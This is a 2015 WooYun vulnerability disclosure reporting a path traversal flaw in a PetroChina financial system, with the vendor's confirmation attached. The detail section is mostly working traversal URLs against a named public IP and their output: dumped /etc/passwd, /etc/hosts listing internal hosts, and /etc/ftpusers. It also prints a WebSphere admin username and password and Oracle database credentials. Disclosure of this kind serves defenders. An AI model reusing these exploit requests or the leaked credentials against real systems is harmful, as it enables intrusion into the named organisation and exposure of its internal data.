当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103282

漏洞标题:中国石油某财务系统任意文件下载

相关厂商:中国石油天然气集团公司

漏洞作者: _Thorns

提交时间:2015-03-24 09:39

修复时间:2015-05-08 16:00

公开时间:2015-05-08 16:00

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-24: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向核心白帽子及相关领域专家公开
2015-04-13: 细节向普通白帽子公开
2015-04-23: 细节向实习白帽子公开
2015-05-08: 细节向公众公开

简要描述:

中国石油某财务系统任意文件下载

详细说明:

url:http://161.207.5.195/NASApp/cpf/distribute/index.jsp

`.jpg


http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/passwd


root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:!:11:11::/var/spool/lp:/bin/false
invscout:!:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:!:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:!:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:!:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:!:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:!:10:0::/var/esa:/usr/bin/ksh
sshd:!:202:201::/var/empty:/usr/bin/ksh
mont:!:204:0::/home/mont:/usr/bin/ksh
rt:!:12:0::/home/rt:/usr/bin/ksh


http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/host


# Internet Address	Hostname	# Comments
# 192.9.200.1     	net0sample	# ethernet name/address
# 128.100.0.1		token0sample	# token ring name/address
# 10.2.0.2		x25sample	# x.25 name/address
# 2000:1:1:1:209:6bff:feee:2b7f		ipv6sample	# ipv6 name/address
127.0.0.1		loopback localhost	# loopback (lo0) name/address
10.211.209.176	ecdisb4
10.211.209.172  ecappb2
10.211.209.171  ecappa2
10.211.209.174  ecbankb3
10.8.19.40 	devtc1
#DLPAR IP
192.168.127.5	ecdisb4


http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/ftpusers

1.jpg


#root
daemon
bin
sys
adm
uucp
guest
nobody
lpd
lp
invscout
snapp
ipsec
nuucp
pconsole
esaadmin
sshd


cd /was/diswas/AppServer/bin
./stopServer.sh server1 -username admin -password adminadmin


O AssociatedbURL = jdbc:oracle:thin:@10.21.0.15:1521:dss
DB_USERNAME = cwgs
DB_PASSWORD = cwgscon

漏洞证明:

O AssociatedbURL = jdbc:oracle:thin:@10.21.0.15:1521:dss
DB_USERNAME = cwgs
DB_PASSWORD = cwgscon

修复方案:

版权声明:转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-24 15:58

厂商回复:

非常感谢您的报告,问题已着手处理。

最新状态:

暂无